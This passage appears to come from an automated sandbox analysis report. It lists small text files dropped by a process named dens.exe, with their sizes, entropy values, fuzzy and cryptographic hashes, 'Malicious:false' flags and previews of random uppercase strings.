                                                                                                                                                                                                                                            Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                            MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                            SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                            SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                            SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694311754777018
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:A8RGU2wNw6pbc5fP6UBtRzjn+4sNp3GYuf5/4dImDNR4+R00JOGJP89a:Aw4w9h+fiUBtJj+44pc3mDL4+R0MVJ/
                                                                                                                                                                                                                                            MD5:61908250A5348CC047FF15260F730C2B
                                                                                                                                                                                                                                            SHA1:CBCF34156EAE25B328A926E21008598EE8D1CBDE
                                                                                                                                                                                                                                            SHA-256:8700BF8369D39FD5DF142F9482CE8860BD8A26A3304EFBC57CBF9E45782C7A3A
                                                                                                                                                                                                                                            SHA-512:BCAB9A36BF1111B05BC52D8921CAC19ABC0FA18D93EA4EB9866DF4B31624FFCA2FF55A09C5051DC2AECAB18828BA8FDA5F31FA0F1E1B7CDC51DF39041E2A82F3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:UOOJJOZIRHPVBWNJCWUSWUNTMYTRIXAVHMVNTYLIPCAYUDIDHLMFMKJROINQAVRXUZLNINNJJSHFEFPSZPLVVWBUDRECRECFHEVVEZDHIFPUKQTLDLWAAKNHNLRQDSPWEEVMZICDCINAORJHMIUUNNJHMWJLZHCNXQIZIPHJPLEDKWATEVYJSWRRMCEJGQXHFBOGXKHJFORHFMGMLTTZJKPJBYMKZVWGZAIGHCFNXGRNDDLJZMCZBXDTQVGPSMNLFNFDHXXCXDJJUNSVHDRBZEZFIUQIYSJVDHEFPPPROTSFKVYAURVOKTIKGYYSWJMCPHHISKCOIVXEIQWZICSWMZJVHXNBACFJZRIEQPOISHMZILEXPCMYBSQRASRNWPSMMYPWJFEXHUUJQAMZDZSIKVETWBZUQBTDCCOYIIJFYYHXPZIUCZRQQFYTKLLGWQPTPZJIZHUEFVCDUNPMVORWJRIAYGRRAHBFWKSAMTDEVSHQXJBHBMOINFGNSRFJDWPSMFABPWRZHIOIPNMLHKGNVWQJYVTWLEZDGMBOJLNHPJKWMHWBVAEGELRTQORSRZQBNXOXEHQJHOEQVNZZJSGWQGINLWNPWFSJNPGRBFOBAEJAOEEMVKZTQZEVVODQLWGPNPNOPXEXLEESZERAPVAPHAUNNCEHTNMFJYBTYGSNGBIEDWGUTNCJDESWGYITWPGBEFVMZYUYPQOQBFITFPUQTWZNQFLWVTMUIAOXBCINJDYCHTXVFQFJQSMNUTYABAAOGGEUKHMDYKLCSGIBIFQSYOIRBUYVSCPDGMVNAQBKZPEKHNRNDPIHOUUTPJDKDOACRPOMZOQCOIAOBNPJLJIYDLQLQUMPIRAMVWNBCMMWFDLTUGWRDVGNHOOODYTHAGWDMJKRVJZFYCVLFLQUWEILFSEPBEADHBHFVWZGUZKNXQCRSBRLGIVTWCSHGFTTTPQAKFWFDXDYXWAWDKWXXTMSJSVOBRAYZGGBDPJOGLIZ
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                            MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                            SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                            SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                            SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                            MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                            SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                            SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                            SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.697336881644685
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:DVE9Jf1tiezZxapTBz4fmlhQHdwc6WS/ZCGxruwyJM:Deu8xafWWKHj6Zx
                                                                                                                                                                                                                                            MD5:08AF516B9E451DB9845289801A21F1BC
                                                                                                                                                                                                                                            SHA1:D43E58D334ACFAE831AD929003D89DC6D3B499F9
                                                                                                                                                                                                                                            SHA-256:C459EA8FCABD26C75606F78F91AA8446698D90422EE4869ABE4ABCCB50B45379
                                                                                                                                                                                                                                            SHA-512:C8C2BB634740DBDDC5928E5FD3960011BB86842B72673FDCE2D65C86AE6D5945F0C88E81AE96DEA711CC654FAC8B4EC809DF18F57BFB4129503DE37E426CF055
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:WKXEWIOTXIKPVKMTOJVZKCCJOJQJVVBUCRVSCWBTZFRFCLMJEFYWDAADXDSWAVKQUKEQVBGBEVVYQQKRCSDIQBFHQPNUHXEGBVBQAZXUXMBFNLNCNTBFAMVYZJITBIGADWSFAFETGWVSLSMWHTRSSUNGFAPUBMTUYBFNDIWUKESLBWQSCOTLFFHGDQBTCYHJBCBOARQTWMUDRIUXIXOCLDIEADCRMXGAMQGVIRNLAGTALJHBZWRNXXRRBLYDOAYCBGEJCTGYVJXPIAIVUAKQQBRSXZKMFBMWWCHMTGNMNRBVSOTUFWOEJRLHHVPMJECGASFUTKIEPJVDDGJBEAOSKQSOAKQFVDMPVFZXVQQGBIVNAKYSEGLMWLAYDYTALUJSLPWCLEJKQBXBYHAKPFMJEIYHGDOFGQSDOCEQICJNJHPIMYZXEEBLQDGZQJHXKMNXDWJCMMFBONBYYWLDOKPYOROQOAOXKLNFZNGOBDFJUKRZTHKLRBINVCYAUIXORJECNOHLVMBHPPCTEWZMHAKKOWVWNWGYCHRMUWRNDXFYYWTIGTCJKQDPGUNHAJQDLUZMXHCGTFUQBMGYHZZQTDVDXANXWNWKFTJJGQDHQOXVXPQVSIEKEEJXYUACENKWKIJBJQXHMLMPZXYAVPNORKZSDXAKFPVLVKXAALPKPLPVFPCSRBEEJDNJCIJXXOCNXCBVGHIYCQQVQHTTNURHGTJJXKJRPJEGOUFOHMMCJGVNMXOAXZBVGWVBLQZNFUTGTNMFHQOEJPQLIMHIWPQHWMJJDCVVMWJEEFQQZJEEECMHCCUANTBJYRWUCSJSOHYMSBWTKOKBZPVNMIVCLDDALCEUFSLAOCOCSAXADDYPCSIANHKQFGMSMYTDVKAOIYTWPDDCRKDNZYGXHYDSDFXTLUDKREZTPVBCYOHCUNIFNCKBSSGTENGDYROMJUTSSFWEEFXLJPBMSINKXZCEUWQMDWGNHDWNFHYTECVIYIAPNGWL
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                            MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                            SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                            SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                            SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                            MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                            SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                            SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                            SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.702896917219035
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:/PRNNS0CSvZqsz3phzXGrOVx0E5lpmo3ntC4hUh31nnrgy:/wQvwsz3phzWrOVxXnncRh31nrgy
                                                                                                                                                                                                                                            MD5:C68274AA8B7F713157BEBE2FCC2EA5D3
                                                                                                                                                                                                                                            SHA1:52A5A2D615A813B518DDAAC2A02095F1059DAAD5
                                                                                                                                                                                                                                            SHA-256:362C32AB7AEE8A211871A6045DADFEBF087D5EC2A3470FBEF42BC1C0E8CF0542
                                                                                                                                                                                                                                            SHA-512:BB653D9E0948C2BD3586BC7CABC777BCDA84F749B73B26E4FD667C22F9629D8A7EC4F94ADBCAAF679FC116CDDA1F0D55CB348CD50BD3B6A4484F48A203E32883
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:BPMLNOBVSBRFPSKLKRJEVHBRVUUOUWMMDGAHEFTOXDSJSRQBDQADKRAAIMJBBXHJZSYGDGSBIJCBPDLCIPLGVURSSGYXQXCVEDYOHFVNTWOSWAODXQUYSQDZDKFJYMCQZOAAPCNEEITKKQAOZJLGLFTYOILWUOSTJMBMUSHEQYRRGRAOIGHQXDIXRMKPCYCIDORIRGMLSPAFIUBBOMPKCNUTVROXQQMRPPEYTVHGRIWJQZREOHPNIXFSPUEZGKVJWTNJVDHDCOMTLCENQMHDIOFNLZNLPFMCGQAWNZVHKKTCZJIHININWOCQTMBLXKYEUXUUKCZAKOINULOSSFHJSGRNIDZZLUKXSJKRQIPXODCNMCWZEQEGJHTKEBKCHWRCJJEITXLWRGJUOYWSWNFVRXXLTBNUBFYSNPVKHAJAOKQIGZUIREJCJKNRVWECUBFUQVUSSEVFZFGAGLZHTJIRXFGLLTHCDJRQSVBUTENMMECBKNQAOTCGUKCAUANZSSYPURGXINFDSJOSJXFPPQOKWUJNGLOACGPRELXIXQZZNXUEJPFZQRDXMWSGEPNTSQRNGFYRRORGOCRJKMCRFZPVDFDRDZCHPWYNXBAOHXICQPOHWXUVYMEAZUMLLNZQAOCCUKTGCMNZUMKUHEIUUYFGMSIEUWOKDVUTQHRMSVPQFKZILWLKZLKCAJHKFHZJFEJAIIZQWILLXMKWLUETDBWSKQOQQECLVCWJSIQXHNDZAYVIFNNYOZKGGFZMIYUCHYFNVXUHKZCOQBJAYWMEKPQVFWNVIJXYFYHWXFXSXDCSRYIODDWXNUTAYNOXAVMATSYETUSRJPYJEQCIEGHSXOOCALKHPRGXFNWHDUNNXCXELBKBUMKTJRNZBLLQWINSTBBGQYWIVUZENAMGRAYFSSGBXLPJXWYTCERBJXCYMHQMJPSVPWCDSLLUJZTWDDJDHIADYETBWZFZQTYTPWPBFDIVVSAOFDDHMUMYLEFUUIKC
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.705615236042988
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                                                                                                                                                            MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                                                                                                                                                            SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                                                                                                                                                            SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                                                                                                                                                            SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:DTBZGIOOSOGIXCBMGZZTWMBQXGHIBDIDBNCACFDFVBOXTDUUJMUMBAKZSHFEIWNQHEECYVTVTSOTORNQIPIDARMCQDPQAFMDPEUWMOYTBCDCAYVFJLXBCNSKBDWMSQYEQYRUTREAZDRNQIZYXPRJXUJXDYZYLJWOVPCEZSCSUSREYDMTRVOKIKSVPBPVQFMFFQNUDCCBDNGIIDGYMQHFPEMCFEOSEKVDEHVQZBXIBJURBZFVTYETURFSVIYLBMHJKBCAPGOAJJFKOTEXRMHREBNTBJGLLRAKZHXKTTSKEXODMEVVGUJOGNLYLFYGHQIBHAFRVYETMDPLEXBQXLVWYLIMFCJAKPFWSQSVSWYINAAOPMCAAVTIWDFRPKUBYLVKYRNUDCLWZJHLKSXWPDEXGEVUQVEJQWTUUYNTOIRLKQTXRWJHCSMGZWWPGPBFZQLOSDMHAPKSMVNNMIVJAORPRFUXPDROELZMLHAIBRVVWUMSDWFAHIBDVMGGFRISFYQZZSESXHMSUQCQPXBCPTAZBJXKKLRBWEZYGWRXBBTYWRRUXCBJIWCOYQKBQCGCZCPFVLGETTTZLEFZDQMQFHJVERUYLQUPVYRNXQJRLPUBWWQHPTYNORTRKKOMLWKAQZNHZQUJGTIYVIKGAWLHSALTZENHAAJKNKUBSQXDVFQRUFJLDFZAQUPCRNDOOEIALNCMGYLCEZSLPOPYEKIEYDRXSDONBFKQKQMAWBJULDADUHXOQGQLIDEPZRHMCBVTLCJUGOZRYCGXCXPEOJTGJORAEJKASXKARQEVOHMITSWHQEWOJXNOGSKWUQQTSOSWSCCMOUDMMHPYKEAJECJSGTBNPSFVWSGFBKGSKEHVLWONOMPOOJEJHDMKGRPCSBYWCZNHTWZCKQNEGEYABJZETYLVHROKZJAIGKJDHLJBRYOVDHNANLCJBHTDDRPXIXDIHNWDDQDHPSAKZRRXOFYYXZWQWZFESELWVMUIBHMCLVZP
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.695860210921229
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:TFQT9Q9JyaMK5Tkl4rqfRs73U2PVD3BWUS:mT9iSRiqfRsxPGt
                                                                                                                                                                                                                                            MD5:71B2CE35DD64EA4E8D5C67BD6BFF698E
                                                                                                                                                                                                                                            SHA1:48D65EB151E97D1D41267A43B4DC1801C4F89255
                                                                                                                                                                                                                                            SHA-256:A6DBE7820A7D3FD17EB24EE41CCE56C9647B150E1A1392F58ABD947EE1829FC7
                                                                                                                                                                                                                                            SHA-512:73128DA16516B0E5D04EB6D859A8FDC4663B47F74A7AAC99263582746BC414BAB05FB4DFF40F5E0EF838682D63671FE11DD6C5891D059D51FFB872E1FD9B60BA
                                                                                                                                                                                                                                            Malicious:false
